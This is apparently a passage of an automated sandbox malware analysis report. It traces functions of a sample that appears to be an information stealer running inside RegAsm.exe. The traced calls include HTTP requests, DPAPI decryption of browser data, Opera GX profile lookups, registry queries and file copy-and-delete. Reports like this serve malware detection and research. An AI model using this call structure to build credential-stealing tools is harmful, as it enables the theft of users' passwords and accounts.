                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1817501562-0
                                                                                                                                                                                                                                                    • Opcode ID: 592b63ca7348667302581678cfc995f3a6f481760c51546ef58fc273c909a5a9
                                                                                                                                                                                                                                                    • Instruction ID: ced62f0c9d76f167d6355a59abce582caadc39f5729d35d675224ef45e3cc0ab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 592b63ca7348667302581678cfc995f3a6f481760c51546ef58fc273c909a5a9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88118475700218EFC710DFA9CC94E9A7BB9EFC9744B14846AE509C7310D636EE42CB64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00407160 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(015CF760,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,0041FE20,000000FF,?,0040BBB3,015D1E50), ref: 00407191
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(015CF760,00000000,00000000,?,0040BBB3,00426884,00426884,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0042687F,?,?,?,00000000,0041FE20,000000FF), ref: 0040720E
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D1908,?,?,?,00000000,0041FE20,000000FF,?,0040BBB3), ref: 00407226
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00407186, 004071A4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                    • API String ID: 2929475105-3463377506
                                                                                                                                                                                                                                                    • Opcode ID: cd7c307f5c15e6edccec74f28977e4a4dda8ced292feeab1b9e0e8de356caf32
                                                                                                                                                                                                                                                    • Instruction ID: ff5baa7508eb580497d81326ae610f775a1c8a3da24c88ea0d8a3a139ac368d5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd7c307f5c15e6edccec74f28977e4a4dda8ced292feeab1b9e0e8de356caf32
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4641AD70904605EFC724EFA4EC45EAEB77AFB18B00F10527EB511A32E1DB782945CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004138C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 87COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413932
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                                                                    • String ID: C!B$ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 1815705353-1759716129
                                                                                                                                                                                                                                                    • Opcode ID: b71d940b18af3346eb70c0ca1033037549b34b704384c8880aa28f749b0a20ad
                                                                                                                                                                                                                                                    • Instruction ID: 7650e82af02da2d734c43ede4cd12e0a938372c71d8139ad895a92a1c50c0a87
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b71d940b18af3346eb70c0ca1033037549b34b704384c8880aa28f749b0a20ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5314070904289EADB10FFA5C5057DDBBB8AF15708F5041BEE815736C2DB786B08CBA6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040A050 Relevance: 6.3, APIs: 4, Instructions: 282filestringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,004268DA,00000009), ref: 0040A107
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040A2EB
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040A2FF
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040A381
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                                                                                                    • Opcode ID: e74e1e35314e9e89459532bb8eea8f20ac7a9f8d88b539b6db2c8e253538c89d
                                                                                                                                                                                                                                                    • Instruction ID: d82cfd6454ef56ffb7848bafa6e881545816eb35bce5fbaf07534375b8af11bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e74e1e35314e9e89459532bb8eea8f20ac7a9f8d88b539b6db2c8e253538c89d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BB18171801248EACB14EBE5C955AEEBB78AF29304F54417EE416736D2DB382B0CCB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040CCC0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,015D1FB8,?,?,?,?,?,?,?,?,?,?,?,00421360,?), ref: 0040CD2B
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E57
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalAlloc.KERNEL32(00000040,00000000,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E66
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E7D
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalFree.KERNEL32(?,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E8C
                                                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                                                                      • Part of subcall function 00406EB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406ED5
                                                                                                                                                                                                                                                      • Part of subcall function 00406EB0: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406EED
                                                                                                                                                                                                                                                      • Part of subcall function 00406EB0: LocalFree.KERNEL32(?), ref: 00406F0E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                    • String ID: $DPAPI
                                                                                                                                                                                                                                                    • API String ID: 512175977-1819349886
                                                                                                                                                                                                                                                    • Opcode ID: 970e0bce3b969683d1a7621f3f8100d526387f160b36815cd488ba9c7b4e5bb0
                                                                                                                                                                                                                                                    • Instruction ID: 75da1f7ccfa6cf6da9a568bd461e096bcf04e9bb7e6024fb3605043521e1bcd9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 970e0bce3b969683d1a7621f3f8100d526387f160b36815cd488ba9c7b4e5bb0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC3192B2D00109EBCB10EB95DD46AEFB779AF44704F14023AF915B32D1EA38A9458AE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410380 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410395
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041039C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,015CB3D8,00000000,00020119,00000000), ref: 004103BB
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,015D17E8,00000000,00000000,00000000,000000FF), ref: 004103D6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3676486918-0
                                                                                                                                                                                                                                                    • Opcode ID: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                    • Instruction ID: 8998dbdc6ac1c2734aa3ee40cb0f29f0ceedf42553b9b0696ff08a15275b7f29
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F04FB9650219BFE710DBA0DC49FAB7B7EEB49B01F005159FB05D7240D6B0590087A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040E1D0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 485COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00426903,00426902,?,?), ref: 0040E22D
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: StrStrA.SHLWAPI(00000000,015D1FB8,?,?,?,?,?,?,?,?,?,?,?,00421360,?), ref: 0040CD2B
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                    • String ID: $$Opera GX
                                                                                                                                                                                                                                                    • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                                    • Opcode ID: bba071b6e6b3f0a7529075e2d6a3f0be80e3b01bed3b299e6f9dee629c1596ad
                                                                                                                                                                                                                                                    • Instruction ID: bea105d340fcfc59e88543d8c5d41a54c1076f51781bcab3c520ee873409635a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba071b6e6b3f0a7529075e2d6a3f0be80e3b01bed3b299e6f9dee629c1596ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA128271901248EACF14EBE5D946ADDBBB9AF14704F14817EE806736C2DB781B0CC7A6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00413C30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413C60
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413D2F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                                                                    • String ID: ERROR
                                                                                                                                                                                                                                                    • API String ID: 1659193697-2861137601
                                                                                                                                                                                                                                                    • Opcode ID: bbdc729ce4f449663b32e4b4ebf0fa1af5c0db0f7d4729d83b8e669bdd32601c
                                                                                                                                                                                                                                                    • Instruction ID: 2ff621651eb54319cabf18834ebd8b9fcbe5b9a399e785df5703c789d8484b08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbdc729ce4f449663b32e4b4ebf0fa1af5c0db0f7d4729d83b8e669bdd32601c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2941B6B1D00248EFCB10EFA9D846BDE7BB4AF09304F10817EF40567281DB389648CBA5
                                                                                                                                                                                                                                                    Uniqueness

